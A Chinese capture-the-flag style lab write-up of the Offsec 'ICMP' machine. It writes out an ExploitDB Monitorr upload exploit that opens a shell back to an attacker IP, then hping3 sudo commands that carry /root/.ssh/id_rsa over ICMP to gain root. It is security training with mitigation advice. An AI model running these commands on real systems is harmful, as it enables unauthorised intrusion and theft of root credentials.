[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升
字数 1250 2025-08-20 18:18:05

[Offsec Lab] ICMP Monitorr-RCE + hping3 权限提升技术分析

一、环境信息

  • 目标IP:192.168.52.218
  • 开放服务
    • SSH (22/tcp): OpenSSH 7.9p1
    • HTTP (80/tcp): Apache 2.4.38 + Monitorr应用

二、信息收集

  1. Nmap扫描

    nmap -p- 192.168.52.218 --min-rate 1000 -sC -sV -Pn
    • 发现Monitorr服务路径:http://192.168.52.218/mon/

  2. 漏洞搜索

    • 使用searchsploit发现Monitorr存在公开漏洞: 
      searchsploit Monitorr -w
    • 相关漏洞:PHP Webapps Exploit (48980.py),用于远程代码执行(RCE)。

三、漏洞利用(Monitorr-RCE)

  1. 利用步骤

    • 执行ExploitDB脚本上传Web Shell: 
      python3 /usr/share/exploitdb/exploits/php/webapps/48980.py \
http://192.168.52.218/mon 192.168.49.52 10077
    • 关键点
      • 脚本通过upload.php路径上传恶意文件(默认路径:/mon/assets/php/upload.php)。
      • 成功后获取www-data权限的Shell。

  2. 权限确认

    • 在目标机器上发现用户fox的目录,包含文件:
      • Local.txt:内容为4d2ed33d3467974721246fd088ec495c(Flag)。
      • ./devel/crypt.php:含加密字符串BUHNIJMONIBUVCYTTYVGBUHJNI(可能为后续提权线索)。

四、权限提升(hping3)

  1. sudo权限检查

    sudo -l
    • 发现用户可通过sudo无密码执行hping3命令。

  2. hping3提权原理

    • 利用ICMP协议的数据泄露功能
      • hping3可通过--icmp选项读取/写入文件(需--safe模式绕过内存限制)。
      • 步骤
        1. 监听模式(靶机执行):
        sudo hping3 --icmp 127.0.0.1 --listen signature --safe
        1. 发送文件(读取/root/.ssh/id_rsa):
        sudo hping3 --icmp 127.0.0.1 --sign signature --file /root/.ssh/id_rsa -d 4000 -c 2
        1. 保存私钥并SSH登录
        chmod 600 id_rsa
ssh -i ./id_rsa root@192.168.58.218
    • 关键点
      • 需在靶机本地执行(避免Kali触发内存锁定警告)。
      • -d 4000指定数据包大小,确保完整传输文件。

  3. 获取Root Flag

    • 文件/root/proof.txt内容:407e47c8f6e703f101254a04448f1014

五、技术总结

  1. Monitorr-RCE

    • 漏洞路径:/assets/php/upload.php未授权文件上传。
    • 修复建议:禁用未使用的PHP脚本或更新应用版本。

  2. hping3提权

    • 依赖条件:sudo权限允许无密码执行hping3
    • 缓解措施:限制sudo命令或禁用hping3--file/--listen功能。

  3. 加密文件线索

    • crypt.php中的字符串可能为加密凭据,需进一步分析(如Base64/ROT13解码)。

六、附录

作者:maptnh | 来源:FreeBuf安全社区

[ Offsec Lab ] ICMP Monitorr-RCE + hping3 权限提升技术分析 一、环境信息 目标IP :192.168.52.218 开放服务 : SSH (22/tcp): OpenSSH 7.9p1 HTTP (80/tcp): Apache 2.4.38 + Monitorr应用 二、信息收集 Nmap扫描 发现Monitorr服务路径: http://192.168.52.218/mon/ 漏洞搜索 使用 searchsploit 发现Monitorr存在公开漏洞: 相关漏洞: PHP Webapps Exploit (48980.py) ,用于远程代码执行(RCE)。 三、漏洞利用(Monitorr-RCE) 利用步骤 执行ExploitDB脚本上传Web Shell: 关键点 : 脚本通过 upload.php 路径上传恶意文件(默认路径: /mon/assets/php/upload.php )。 成功后获取 www-data 权限的Shell。 权限确认 在目标机器上发现用户 fox 的目录,包含文件: Local.txt :内容为 4d2ed33d3467974721246fd088ec495c (Flag)。 ./devel/crypt.php :含加密字符串 BUHNIJMONIBUVCYTTYVGBUHJNI (可能为后续提权线索)。 四、权限提升(hping3) sudo权限检查 发现用户可通过 sudo 无密码执行 hping3 命令。 hping3提权原理 利用ICMP协议的数据泄露功能 : hping3 可通过 --icmp 选项读取/写入文件(需 --safe 模式绕过内存限制)。 步骤 : 监听模式 (靶机执行): 发送文件 (读取 /root/.ssh/id_rsa ): 保存私钥并SSH登录 : 关键点 : 需在靶机本地执行(避免Kali触发内存锁定警告)。 -d 4000 指定数据包大小,确保完整传输文件。 获取Root Flag 文件 /root/proof.txt 内容: 407e47c8f6e703f101254a04448f1014 。 五、技术总结 Monitorr-RCE 漏洞路径: /assets/php/upload.php 未授权文件上传。 修复建议:禁用未使用的PHP脚本或更新应用版本。 hping3提权 依赖条件: sudo 权限允许无密码执行 hping3 。 缓解措施:限制 sudo 命令或禁用 hping3 的 --file / --listen 功能。 加密文件线索 crypt.php 中的字符串可能为加密凭据,需进一步分析(如Base64/ROT13解码)。 六、附录 工具链接 : ExploitDB 48980 hping3 GTFOBins 免责声明 :本文仅用于技术研究,禁止用于非法用途。 作者 :maptnh | 来源 :FreeBuf安全社区